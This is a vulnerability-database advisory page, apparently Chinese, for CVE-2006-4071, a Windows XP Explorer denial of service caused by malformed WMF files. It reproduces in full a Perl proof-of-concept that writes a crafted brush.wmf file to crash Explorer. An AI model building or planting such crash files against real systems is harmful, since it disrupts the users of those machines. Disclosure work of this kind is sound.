Microsoft Windows资源管理器畸形WMF文件拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112001 漏洞类型 设计错误
发布时间 2007-01-13 更新时间 2007-06-27
CVE编号 CVE-2006-4071 CNNVD-ID CNNVD-200608-145
漏洞平台 Windows CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/3111
https://www.securityfocus.com/bid/19365
https://cxsecurity.com/issue/WLB-2006080062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-145
|漏洞详情
MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows在处理畸形WMF文件时存在拒绝服务漏洞,资源管理器在处理包含畸形文件的目录时会发生崩溃。
|漏洞EXP
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

# milw0rm.com [2007-01-13]
|受影响的产品
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional x64 Edition Microsoft Wind
|参考资料

来源:BUGTRAQ
名称:200608060-dayXPSP2wmfexploit
链接:http://www.securityfocus.com/archive/1/archive/1/442426/100/0/threaded
来源:BUGTRAQ
名称:200608070-dayXPSP2wmfexploit(somedetails)
链接:http://www.securityfocus.com/archive/1/archive/1/442420/100/0/threaded
来源:VUPEN
名称:ADV-2006-3180
链接:http://www.frsirt.com/english/advisories/2006/3180
来源:SECUNIA
名称:21377
链接:http://secunia.com/advisories/21377
来源:FULLDISC
名称:200608070-dayXPSP2wmfexploit(somedetails)
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048547.html
来源:FULLDISC
名称:200608060-dayXPSP2wmfexploit
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048530.html
来源:XF
名称:windows-wmf-gdi32-dos(28281)
链接:http://xforce.iss.net/xforce/xfdb/28281
来源:BID
名称:21992
链接:http://www.securityfocus.com/bid/21992
来源:BID
名称:19365
链接:http://www.securityfocus.com/bid/19365
来源:BUGTRAQ
名称:20070111WMFCreateBrushIndirectvulnerability(DoS)
链接:http://www.securityfocus.com/archive/1/archive/1/456585/100/0/threaded
来源:MILW0RM
名称:3111
链接: